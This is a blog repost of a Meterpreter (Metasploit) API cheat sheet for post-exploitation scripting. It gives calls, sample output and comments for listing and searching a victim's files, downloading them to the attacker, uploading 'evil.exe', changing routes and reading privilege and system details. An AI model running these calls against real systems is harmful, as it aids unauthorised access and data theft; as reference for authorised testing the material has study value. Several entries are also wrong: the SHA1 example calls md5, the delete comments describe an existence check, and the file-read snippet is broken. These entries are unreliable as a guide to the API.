This page contains meterpreter methods with their syntax and output. The aim was to provide a quick reference for the meterpreter script developer. 


Rather than checking the code of already existing meterpreter scripts and searching for the relevant method, this page can be like a one stop shop.


Hope this will help newbies and enthusiast like me who want to start writing their own meterpreter scripts. 


P.S : Not all the methods are covered as this is all i can do in 3 hours. More to update soon :)




Get all the files/folders in a directory


Syntax: client.fs.dir.entries

Output: ["AUTOEXEC.BAT", "boot.ini", "CONFIG.SYS", "Documents and Settings"]

Comment: By default it will get the files and directories of present working directory.


Syntax: client.fs.dir.entries("c:\\")

Output: ["sample_file.txt","dummy_directory","myfile.exe"] 

Comment: This will get the files and directories of c drive.


Get all the files/folders in a directory along with extra information


Syntax: client.fs.dir.entries_with_info

Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]

Comment: By default it will get the files and directories of present working directory.


Syntax: client.fs.dir.entries_with_info("c:\\")

Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]

Comment: This will get the files and directories of c drive.


Change the directory


Syntax: client.fs.dir.chdir("c:\\")

Output: 0

Comment: This will change the present working directory to c drive.


Make directory


Syntax: client.fs.dir.mkdir("c:\\oldman")

Output: 0

Comment: This will make a directory named "oldman" in c drive.


Get current working directory


Syntax: client.fs.dir.pwd

Output: "c:\\oldmanlab"

Comment: This will give the current working directory name



Syntax: client.fs.dir.getwd

Output: "c:\\oldmanlab"

Comment: This will give the current working directory name


Delete a directory


Syntax: client.fs.dir.delete("c:\\oldman")

Output: 0

Comment: This will delete the specified directory only if empty.


Syntax: client.fs.dir.rmdir("c:\\oldman")

Output: 0

Comment: This will delete the specified directory only if empty.


Syntax: client.fs.dir.unlink("c:\\oldman")

Output: 0

Comment: This will delete the specified directory only if empty.


Download contents of a target directory


Syntax: client.fs.dir.download("/root/oldmanlab/","c:\\oldman")

Output: [".", "..", "firefox.lnk", "my_file.txt"]

Comment: This will download all the file inside oldman directory of victim and will save inside the oldmanlab directory of an attacker system.


Upload contents of a local directory to victim system


Syntax: client.fs.dir.upload("c:\\oldman","/root/oldmanlab")

Output: [".", "..", "firefox.lnk", "my_file.txt"]

Comment: This will upload all the content inside oldmanlab directory of an attacker to the oldman directory of victim system.


Get the file separator


Syntax: client.fs.file.separator

Output: \\

Comment: This will give the file separator used by the system (\\ for windows, \ for unix.


Search for the specified file


Syntax: client.fs.file.search("c:\\oldman","hacking.txt")

Output: [{"path"=>"c:\\oldman\\lab", "name"=>"hacking.txt", "size"=>4}]

Comment: This will search for hacking.txt in the oldman directory and its subdirectories


Get the basename for the specified file


Syntax: client.fs.file.basename("c:\\oldman\\hacking.txt")

Output: hacking.txt

Comment: This will give the filename of the filepath specified. 


Expand path of the directory


Syntax: client.fs.file.expand_path("%TEMP%")

Output: "C:\\WINDOWS\\TEMP"

Comment: This will give the absolute path of the shortcut specified


Get the md5 of file


Syntax: client.fs.file.md5("c:\\oldman\\file.txt")

Output: "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'"

Comment: This will give the md5 sum of the specified file


Get the sha1 of file


Syntax: client.fs.file.md5("c:\\oldman\\file.txt")

Output: "Q\xD0\b\xFF\xFA\xD8\xF4x7_\xAE\x911\xB4\xE12V\xB8\tw"

Comment: This will give the sha1 of the specified file


Check if specified file exists


Syntax: client.fs.file.exists?("c:\\oldman\\file.txt")

Output: true

Comment: This will return true if file exists else false


Delete specified file


Syntax: client.fs.file.rm("c:\\oldman\\file.txt")

Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0 

Comment: This will return true if file exists else false


Syntax: client.fs.file.unlink("c:\\oldman\\file.txt")

Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0 

Comment: This will return true if file exists else false


Upload file to victims system


Syntax: client.fs.file.upload("c:\\oldman","/root/lab/evil.exe")

Output: ["/root/lab/firefox.lnk"]

Comment: This will upload evil.exe from attackers system to victims oldman directory


Download file from victims system


Syntax: client.fs.file.download("/root/lab/secret.exe","c:\\oldman\\secret.exe")

Output: ["c:\\oldman\\secret.exe"]

Comment: This will download secret.exe from victims system and will save it to attackers root directory


Open a file in read mode and copy the content to some variable


Syntax: file1 = client.fs.file.new("c:\\oldman\\my_file.txt")

              temp = ""

              until file1.eof?

              temp << file_object.read

Output: N.A

Comment: This will copy all the data inside my_file.txt and store it in temp variable


List all the available interface from victims system


Syntax: client.net.config.get_interfaces

Output: [......]

Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc


Syntax: client.net.config.get_interfaces[0]

Output: [......]

Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc


Get the IP address of specified interface


Syntax: client.net.config.get_interfaces[1].ip

Output: 192.168.7.3

Comment: This will give IP address of the second interface in the list.


List all the routes available in victims system


Syntax: client.net.config.get_routes

Output: 

Comment: This will return an array of all the routes available in the victims system along with the details like subnet, netmask, gateway


Syntax: client.net.config.get_routes[0]

Output: 

Comment: This will return an array of the first route available in the victims system along with the details like subnet, netmask, gateway


Add a route in victims system


Syntax: client.net.config.add_route("x.x.x.x","x.x.x.x","x.x.x.x")

Output: true

Comment: This will add route in the victims system. The first parameter is subnet, second is netmask and third is gateway.


Remove specified route from victims system


Syntax: client.net.config.remove_route("x.x.x.x","x.x.x.x","x.x.x.x")

Output: true

Comment: This will remove route from the victims system. The first parameter is subnet, second is netmask and third is gateway.


Get the user id


Syntax: client.sys.config.getuid

Output: "NT AUTHORITY\\SYSTEM"

Comment: This will give the user id of the victim system. It basically shows our access level.


Get the victims computer name


Syntax: client.sys.config.sysinfo["Computer"]

Output: "WINXP-1337"

Comment: This will give the computer name of the compromised system.


Get the victims operating system name and version


Syntax: client.sys.config.sysinfo["OS"]

Output: "Windows XP (Build 2600, Service Pack 2)."

Comment: This will give the operating system name running on the compromised system.


Get the victims operating system architecture


Syntax: client.sys.config.sysinfo["Architecture"]

Output: "x86"

Comment: This will give the architecture (x86,64-bit)of the operating system running on compromised system.


Get the victims operating system language


Syntax: client.sys.config.sysinfo["System Language"]

Output: "en_US"

Comment: This will give operating system language of the compromised system.


Revert to previous user privileges


Syntax: client.sys.config.revert_to_self

Output: N.A

Comment: Let say if we had change privilege from "NT AUTHORITY\\oldmanlab" to "NT AUTHORITY\\SYSTEM" then revert to self will again change our privileges to "NT AUTHORITY\\oldmanlab" 




출처 - http://oldmanlab.blogspot.kr/p/meterpreter-api-cheat-sheet.html

'공부 > Forensics' 카테고리의 다른 글

[InForensics] 메모리 분석 - 2  (2) 2012.08.12
[InForensics] 메모리 분석 - 1  (0) 2012.08.09
[Forensics]Live Response  (1) 2012.07.25
[Metasploit] Msfpayload  (0) 2012.07.21
[Metasploit]Meterpreter (Reverse exe)  (4) 2012.07.21
Posted by extr
: